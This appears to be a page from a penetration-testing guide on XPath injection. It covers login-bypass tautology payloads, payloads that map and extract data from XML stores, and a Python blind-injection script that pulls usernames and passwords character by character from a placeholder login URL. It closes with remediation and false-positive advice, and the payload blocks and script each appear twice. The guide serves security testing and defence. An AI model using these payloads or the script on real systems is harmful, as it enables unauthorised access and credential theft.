Exploitation A03

XPath Injection

XPath injection targets applications that use XML databases or XML-backed authentication. By manipulating XPath queries, attackers can bypass authentication, extract entire XML documents, and access data they shouldn't see. Unlike SQL injection, XPath has no concept of permissions — a successful injection gives access to the entire XML document.

Authentication Bypass

XPath authentication queries typically follow the pattern //user[username='INPUT' and password='INPUT']. By injecting tautologies (always-true conditions), attackers can bypass authentication the same way as SQL injection.

xpath-auth-bypass-payloads.txt
text
# Inject into Username and Password fields:

' or '1'='1
' or '1'='1
# Result: //user[username='' or '1'='1' and password='' or '1'='1']

admin' or '1'='1' or '1'='1
anything

admin']
anything

' or 1=1 or ''
' or 1=1 or ''
# Inject into Username and Password fields:

' or '1'='1
' or '1'='1
# Result: //user[username='' or '1'='1' and password='' or '1'='1']

admin' or '1'='1' or '1'='1
anything

admin']
anything

' or 1=1 or ''
' or 1=1 or ''

Data Extraction

Unlike SQL, XPath has no permission system — a successful injection can access the entire XML document. Use XPath functions like name(), substring(), count(), and contains() to enumerate the XML structure and extract values.

xpath-data-extraction-payloads.txt
text
# Discover XML structure (node names):
' or name(.)='a' or 'a'='b
' or name(parent::*)='users' or 'a'='b

# Character-by-character string extraction:
' or substring(//user[1]/username,1,1)='a' or 'a'='b
' or substring(//user[1]/username,1,1)='b' or 'a'='b

# Count nodes:
' or count(//user)>0 or 'a'='b
' or count(//user)>5 or 'a'='b
' or count(//user)=10 or 'a'='b

# String length:
' or string-length(//user[1]/password)>5 or 'a'='b
' or string-length(//user[1]/password)=8 or 'a'='b

# Content search:
' or contains(//user[1]/password,'admin') or 'a'='b
# Discover XML structure (node names):
' or name(.)='a' or 'a'='b
' or name(parent::*)='users' or 'a'='b

# Character-by-character string extraction:
' or substring(//user[1]/username,1,1)='a' or 'a'='b
' or substring(//user[1]/username,1,1)='b' or 'a'='b

# Count nodes:
' or count(//user)>0 or 'a'='b
' or count(//user)>5 or 'a'='b
' or count(//user)=10 or 'a'='b

# String length:
' or string-length(//user[1]/password)>5 or 'a'='b
' or string-length(//user[1]/password)=8 or 'a'='b

# Content search:
' or contains(//user[1]/password,'admin') or 'a'='b

Blind XPath Injection

python
import requests
import string

url = "https://target.com/login"
charset = string.ascii_letters + string.digits + "@._-"

def xpath_blind(query):
    payload = f"' or {query} or 'a'='b"
    resp = requests.post(url, data={
        'username': payload,
        'password': 'x'
    })
    return 'Welcome' in resp.text  # True condition indicator

# Count users:
for i in range(1, 50):
    if xpath_blind(f'count(//user)={i}'):
        print(f'[+] Found {i} users')
        break

# Extract username character by character:
def extract_string(xpath_expr, max_len=50):
    result = ''
    for pos in range(1, max_len + 1):
        found = False
        for char in charset:
            if xpath_blind(f"substring({xpath_expr},{pos},1)='{char}'"):
                result += char
                print(f'[+] {xpath_expr}: {result}')
                found = True
                break
        if not found:
            break
    return result

# Extract all usernames:
user_count = 10  # from previous step
for i in range(1, user_count + 1):
    username = extract_string(f'//user[{i}]/username')
    password = extract_string(f'//user[{i}]/password')
    print(f'User {i}: {username}:{password}')
import requests
import string

url = "https://target.com/login"
charset = string.ascii_letters + string.digits + "@._-"

def xpath_blind(query):
    payload = f"' or {query} or 'a'='b"
    resp = requests.post(url, data={
        'username': payload,
        'password': 'x'
    })
    return 'Welcome' in resp.text  # True condition indicator

# Count users:
for i in range(1, 50):
    if xpath_blind(f'count(//user)={i}'):
        print(f'[+] Found {i} users')
        break

# Extract username character by character:
def extract_string(xpath_expr, max_len=50):
    result = ''
    for pos in range(1, max_len + 1):
        found = False
        for char in charset:
            if xpath_blind(f"substring({xpath_expr},{pos},1)='{char}'"):
                result += char
                print(f'[+] {xpath_expr}: {result}')
                found = True
                break
        if not found:
            break
    return result

# Extract all usernames:
user_count = 10  # from previous step
for i in range(1, user_count + 1):
    username = extract_string(f'//user[{i}]/username')
    password = extract_string(f'//user[{i}]/password')
    print(f'User {i}: {username}:{password}')

Testing Checklist

  1. 1. Identify potential XPath entry points (login forms, search, XML-backed APIs)
  2. 2. Test for errors with single quotes: ' in input fields
  3. 3. Test authentication bypass with classic XPath tautologies
  4. 4. Test blind extraction using substring() and boolean conditions
  5. 5. Enumerate XML structure with name() and count()
  6. 6. Test for XPath 2.0 functions if available

Evidence Collection

Injection Proof: Request/response showing authentication bypass or data extraction

Data Extracted: Usernames, structure — redact passwords in report

CVSS Range: Auth bypass: 8.1–9.8 | Data extraction: 7.5–8.6

Remediation

  • Parameterized XPath: Use parameterized/precompiled XPath queries instead of string concatenation.
  • Input validation: Reject or escape special characters: ' " [ ] / @ = *.
  • Migrate to database: Consider migrating from XML data stores to a proper database with access controls.

False Positive Identification

  • XML parsing error ≠ injection: An XML/XPath error in the response indicates input reaches the query, but confirm you can extract data or bypass logic before classifying as exploitable injection.
  • Limited data in XML store: XPath injection in a config file with no sensitive data may be low impact — assess what data the XML document contains.
  • Modern frameworks protection: Many frameworks parameterize XPath queries — verify injection actually modifies the query structure, not just passes through as literal text.